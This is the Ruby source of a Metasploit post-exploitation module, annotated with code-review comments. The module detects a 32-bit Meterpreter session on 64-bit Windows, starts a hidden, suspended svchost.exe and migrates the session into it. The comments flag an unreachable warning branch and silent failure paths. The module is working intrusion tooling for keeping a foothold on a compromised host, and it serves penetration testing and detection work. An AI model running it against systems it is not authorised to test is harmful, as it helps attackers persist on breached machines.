Path: blob/master/modules/post/windows/manage/archmigrate.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that compares the meterpreter process architecture with the host
# OS architecture and, when a 32-bit meterpreter is running under WOW64, starts a
# native (sysnative) process and migrates into it. All work happens through the
# framework `session` object; nothing here runs without a live Meterpreter session.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Post::Windows::Priv

  # Module metadata and datastore options.
  #
  # Options:
  #   EXE           - operator-supplied path of the executable to start and migrate
  #                   into; it is only checked for existence (see do_migrate), not
  #                   otherwise validated.
  #   FALLBACK      - when EXE does not exist, retry with
  #                   <drive>:\windows\sysnative\svchost.exe (see get_windows_loc).
  #   IGNORE_SYSTEM - proceed even when the session already runs as SYSTEM.
  #
  # 'Compat' lists the Meterpreter commands this module needs at run time.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Architecture Migrate',
        'Description' => %q{
          This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a
          new process with the correct architecture and migrates into that process.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Koen Riepe ([email protected])'],
        # NOTE(review): the reference list holds a single empty string; either
        # drop the key or add a real reference.
        'References' => [''],
        'Platform' => [ 'win' ],
        'Arch' => [ 'x86', 'x64' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_migrate
              stdapi_railgun_api
              stdapi_sys_process_execute
              stdapi_sys_process_getpid
            ]
          }
        }
      )
    )

    register_options(
      [
        OptString.new('EXE', [true, 'The executable to start and migrate into', 'C:\windows\sysnative\svchost.exe']),
        OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ]),
        OptBool.new('IGNORE_SYSTEM', [true, 'Migrate even if you have SYSTEM privileges', false])
      ],
      self.class
    )
  end

  # Returns true when the current meterpreter process is reported as a WOW64
  # process (32-bit meterpreter on a 64-bit OS), false otherwise.
  #
  # The decision rests on a single comparison: the 'Wow64Process' out-buffer
  # returned by railgun is compared with four zero bytes.
  #
  # NOTE(review): on the rescue path the method's value is whatever
  # print_error returns (presumably nil, i.e. falsy), so a railgun failure is
  # indistinguishable to the caller from "architectures already match" and
  # do_migrate then prints the "same architecture" message. Returning an
  # explicit value or raising would make the failure visible — confirm with the
  # framework's print_error contract.
  def check_32_on_64
    apicall = session.railgun.kernel32.IsWow64Process(-1, 4)['Wow64Process']
    # railgun returns '\x00\x00\x00\x00' if the meterpreter process is 64bits.
    if apicall == "\x00\x00\x00\x00"
      migrate = false
    else
      migrate = true
    end
    return migrate
  rescue StandardError
    print_error('Railgun not available, this module only works for binary meterpreters.')
  end

  # Returns the portion of the target's %Windir% before the first ':' — i.e. the
  # drive letter — by reading the environment variable through railgun.
  #
  # Only the text before the first ':' is kept, so the caller must re-append the
  # ':' and the rest of the path (do_migrate does this). No error handling: a
  # railgun failure or a missing 'lpBuffer' key propagates to the caller.
  # NOTE(review): the 255/255 arguments to GetEnvironmentVariableA are passed
  # as given; their meaning depends on railgun's marshalling — confirm.
  def get_windows_loc
    apicall = session.railgun.kernel32.GetEnvironmentVariableA('Windir', 255, 255)['lpBuffer']
    windir = apicall.split(':')[0]
    return windir
  end

  # Performs the architecture check and, when needed, the migration.
  #
  # Flow: if check_32_on_64 is truthy, start datastore['EXE'] hidden and
  # suspended, migrate into it and verify the session pid now equals the new
  # pid. If EXE does not exist and FALLBACK is set, repeat the same sequence
  # with <drive>:\windows\sysnative\svchost.exe. The second branch duplicates
  # the first verbatim rather than sharing a helper.
  #
  # Observable host-side behaviour (useful when writing detections for this
  # technique): a hidden, suspended child process is created by the meterpreter
  # host process and the session then moves into it via core_migrate; success is
  # judged solely by comparing pids afterwards.
  #
  # NOTE(review): when the fallback target does not exist either, nothing is
  # printed after the first "does not exist" error — the operator gets no
  # explicit "fallback also missing" message.
  def do_migrate
    if check_32_on_64
      print_status('The meterpreter is not the same architecture as the OS! Upgrading!')
      newproc = datastore['EXE']
      if exist?(newproc)
        print_status("Starting new x64 process #{newproc}")
        # 'Hidden' and 'Suspended' are passed straight to the process.execute API.
        pid = session.sys.process.execute(newproc, nil, { 'Hidden' => true, 'Suspended' => true }).pid
        print_good("Got pid #{pid}")
        print_status('Migrating..')
        session.core.migrate(pid)
        # Migration is considered successful only if the session now reports the new pid.
        if pid == session.sys.process.getpid
          print_good('Success!')
        else
          print_error('Migration failed!')
        end
      else
        print_error('The selected executable to migrate into does not exist')
        if datastore['FALLBACK']
          windir = get_windows_loc
          # get_windows_loc strips everything from the first ':' onward, so the
          # drive separator and path are rebuilt here.
          newproc = "#{windir}:\\windows\\sysnative\\svchost.exe"
          if exist?(newproc)
            print_status("Starting new x64 process #{newproc}")
            pid = session.sys.process.execute(newproc, nil, { 'Hidden' => true, 'Suspended' => true }).pid
            print_good("Got pid #{pid}")
            print_status('Migrating..')
            session.core.migrate(pid)
            if pid == session.sys.process.getpid
              print_good('Success!')
            else
              print_error('Migration failed!')
            end
          end
        end
      end
    else
      print_good('The meterpreter is the same architecture as the OS!')
    end
  end

  # Entry point. Decides whether to run do_migrate based on IGNORE_SYSTEM and
  # the current privilege level (is_system?).
  #
  # NOTE(review): the first `if datastore['IGNORE_SYSTEM']` branch already
  # covers every truthy IGNORE_SYSTEM value, so the third branch
  # (`datastore['IGNORE_SYSTEM'] && is_system?`) is unreachable and its
  # "You will lose your privileges!" warning is never printed. Likewise the
  # `!datastore['IGNORE_SYSTEM']` guards in the second and fourth branches are
  # redundant once the first branch has been rejected. Reordering so the
  # SYSTEM check comes first, or collapsing to `if is_system? && !datastore['IGNORE_SYSTEM']`,
  # would restore the intended warning.
  def run
    if datastore['IGNORE_SYSTEM']
      do_migrate
    elsif !datastore['IGNORE_SYSTEM'] && is_system?
      print_error('You are running as SYSTEM! Aborting migration.')
    elsif datastore['IGNORE_SYSTEM'] && is_system?
      print_error('You are running as SYSTEM! You will lose your privileges!')
      do_migrate
    elsif !datastore['IGNORE_SYSTEM'] && !is_system?
      print_status('You\'re not running as SYSTEM. Moving on...')
      do_migrate
    end
  end
end